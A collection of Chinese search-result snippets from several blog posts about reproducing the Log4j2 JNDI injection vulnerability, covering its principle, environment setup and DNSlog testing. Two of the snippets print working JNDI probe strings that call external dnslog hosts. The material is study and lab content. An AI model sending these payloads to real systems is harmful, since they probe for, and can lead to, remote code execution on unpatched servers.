二、漏洞复现 2.1 使用DNLOG平台查看回显 可以使用相关的dnslog平台查看，也可以使用burp自带的dnslog进行查看，我这里使用的是 http://dnslog.cn/ ${jndi:ldap://rbmanr.dnslog.cn/exp} 有回显，说明存在该漏洞 ...

今天突然想码字，那就写一下log4j。 一、漏洞简介 1.漏洞原理 Apache Log4j2 中存在JNDI注入漏洞，当程序将用户输入的数据进行日志记录时，即可触发此漏洞，成功利用此漏洞可以在目标服务器上执行任意代码。 通俗简单的说就是：在打印日志的时候，如果你的日志内容中包含 ...

第一条，心中无女人，挖洞自然神。 白帽守则第一页第二条，只有不努力的白帽，没有挖不到的漏洞 对此我深表 ...

漏洞就不说了，大家都在加班吧哈哈。然后直接进入正题 环境准备 1.可以直接去vulhub下集成环境 2.自己建maven项目导入log4j2的包即可 我vulhub的环境还没下，用的第二种 首先maven引入 然后在resource下创建log4j ...

本次记录自己测试时每一步操作，很详细。 本次复现分为curl测试和拿shell两种操作，测试完curl后体验时长到期了，只能换环境了。 本次测试环境如下： curl------------------------------------------------------ 靶场 ...

0X00-引言 过年了，放炮 这个漏洞真牛逼，日天，日地，日空气 2021年12月10日凌晨，我正坐在马桶上，突然看到厕纸上面出现一串神秘代码${jndi:ldap://kao5b1ig.ns.dns3.cf.} ,我赶紧起身，打开电脑一看，网页dnslog弹出记录，我大惊，紧接 ...

前景：昨天被一则新闻刷屏 　　当看到这个消息的时候，公司也启动紧急响应，要求来检查目前生产中使用的log4j版本是否有这个问题，根据火线官方说明，但凡是版本在 2.x <= 2.15.0-rc1，都会有这个漏洞，一看到这个，我就知道基本全覆盖了，果然一看服务器上的组件 ...

概念 RMI（Remote Method Invocation） 即Java远程方法调用，一种用于实现远程过程调用的应用程序编程接口 JNDI (Java Naming and Directory ...